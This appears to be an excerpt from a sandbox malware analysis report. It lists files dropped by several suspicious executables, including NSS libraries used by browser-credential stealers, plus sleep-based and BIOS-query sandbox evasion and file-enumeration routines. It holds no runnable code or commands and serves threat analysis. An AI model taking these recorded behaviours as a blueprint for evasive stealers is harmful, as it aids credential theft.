Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\_asyncio.pyd
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-localization-l1-2-0.dll
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\win32\_win32sysloader.pyd
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-namedpipe-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\Pythonwin\mfc140u.dll
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\_hashlib.pyd
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\win32\win32api.pyd
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\cryptography\hazmat\bindings\_rust.pyd
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-crt-convert-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe | Dropped PE file which has not been started: C:\ProgramData\nss3.dll
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\_queue.pyd
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-debug-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-heap-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-util-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10235930101\83f34278c7.exe
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\unicodedata.pyd
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\Pythonwin\win32ui.pyd
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-crt-filesystem-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\_bz2.pyd
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-libraryloader-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\_elementtree.pyd
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-errorhandling-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10028100101\crypted.exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10235940101\0629403be8.exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[2].exe
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10028410101\crypted.exe
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-handle-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\crypted.41[1].exe
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-file-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-crt-math-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\win32\win32trace.pyd
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10235950101\d101bd5267.exe
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\_cffi_backend.cp311-win_amd64.pyd
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\_brotli.cp311-win_amd64.pyd
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\zstandard\_cffi.cp311-win_amd64.pyd
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-string-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-crt-multibyte-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\PIL\_imagingtk.cp311-win_amd64.pyd
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\PIL\_imagingft.cp311-win_amd64.pyd
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-file-l1-2-0.dll
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\_lzma.pyd
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-processthreads-l1-1-1.dll
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-crt-conio-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\_ctypes.pyd
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-rtlsupport-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\simplejson\_speedups.cp311-win_amd64.pyd
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\_multiprocessing.pyd
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-crt-string-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-processthreads-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\dw[1].exe
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-crt-runtime-l1-1-0.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\PIL\_imagingmath.cp311-win_amd64.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\mrwipre12[1].exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-file-l2-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\python311.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-console-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\random[1].exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\PIL\_imagingcms.cp311-win_amd64.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\_decimal.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[1].exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\charset_normalizer\md.cp311-win_amd64.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10019520101\dw.exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\pywin32_system32\pythoncom311.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\pywin32_system32\pywintypes311.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\python3.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\_overlapped.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10026630101\v7942.exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\v7942[1].exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10235960101\718edcc992.exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\PIL\_imaging.cp311-win_amd64.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\random[2].exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\select.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\crypted.7[1].exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10029600101\mrwipre12.exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\PIL\_webp.cp311-win_amd64.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\charset_normalizer\md__mypyc.cp311-win_amd64.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\pyexpat.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\_socket.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\_ssl.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\zstandard\backend_c.cp311-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | API coverage: 4.1 %
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | API coverage: 1.9 %
Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe | API coverage: 3.3 %
Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe | Code function: 17_2_00408370
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7640 | Thread sleep count: 547 > 30
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7640 | Thread sleep time: -1094547s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7628 | Thread sleep count: 1225 > 30
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7628 | Thread sleep time: -2451225s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7600 | Thread sleep count: 270 > 30
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7600 | Thread sleep time: -8100000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7616 | Thread sleep count: 1178 > 30
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7616 | Thread sleep time: -2357178s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7620 | Thread sleep count: 1241 > 30
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7620 | Thread sleep time: -2483241s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7636 | Thread sleep count: 1217 > 30
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7636 | Thread sleep time: -2435217s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7612 | Thread sleep count: 1234 > 30
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7612 | Thread sleep time: -2469234s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe TID: 3336 | Thread sleep count: 9583 > 30
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe TID: 3336 | Thread sleep time: -287490000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe TID: 5600 | Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exe TID: 776 | Thread sleep count: 94 > 30
Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exe TID: 776 | Thread sleep time: -188094s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exe TID: 4584 | Thread sleep count: 98 > 30
Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exe TID: 4584 | Thread sleep time: -196098s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exe TID: 6120 | Thread sleep count: 86 > 30
Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exe TID: 6120 | Thread sleep time: -172086s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exe TID: 5968 | Thread sleep time: -210000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exe TID: 2124 | Thread sleep count: 68 > 30
Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exe TID: 2124 | Thread sleep time: -136068s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exe TID: 6900 | Thread sleep count: 1933 > 30
Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exe TID: 7296 | Thread sleep count: 3133 > 30
Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exe TID: 7296 | Thread sleep time: -6269133s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7808 | Thread sleep time: -17524406870024063s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3700 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6000 | Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\timeout.exe TID: 6852 | Thread sleep count: 38 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5684 | Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5684 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1496 | Thread sleep count: 2378 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1496 | Thread sleep count: 315 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1280 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3560 | Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1948 | Thread sleep count: 3328 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1892 | Thread sleep count: 1328 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1988 | Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2176 | Thread sleep count: 3727 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2164 | Thread sleep count: 144 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4484 | Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2120 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4736 | Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4708 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe TID: 4972 | Thread sleep time: -150000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6748 | Thread sleep count: 4092 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6204 | Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6804 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\M6gQuZPvgY.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | Code function: 13_2_0097EF71 FindFirstFileExW
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Code function: 14_2_0041EF71 FindFirstFileExW
Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe | Code function: 17_2_00407620 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe | Code function: 17_2_00401280 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe | Code function: 17_2_00401090 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe | Code function: 17_2_0040A150 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe | Code function: 17_2_0040B570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe | Code function: 17_2_0040B110 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe | Code function: 17_2_0040B3A0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe | Code function: 18_2_006ADBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe | Code function: 18_2_0067C2A2 FindFirstFileExW
Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe | Code function: 18_2_006B68EE FindFirstFileW,FindClose
Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe | Code function: 18_2_006B698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime
Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe | Code function: 18_2_006AD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
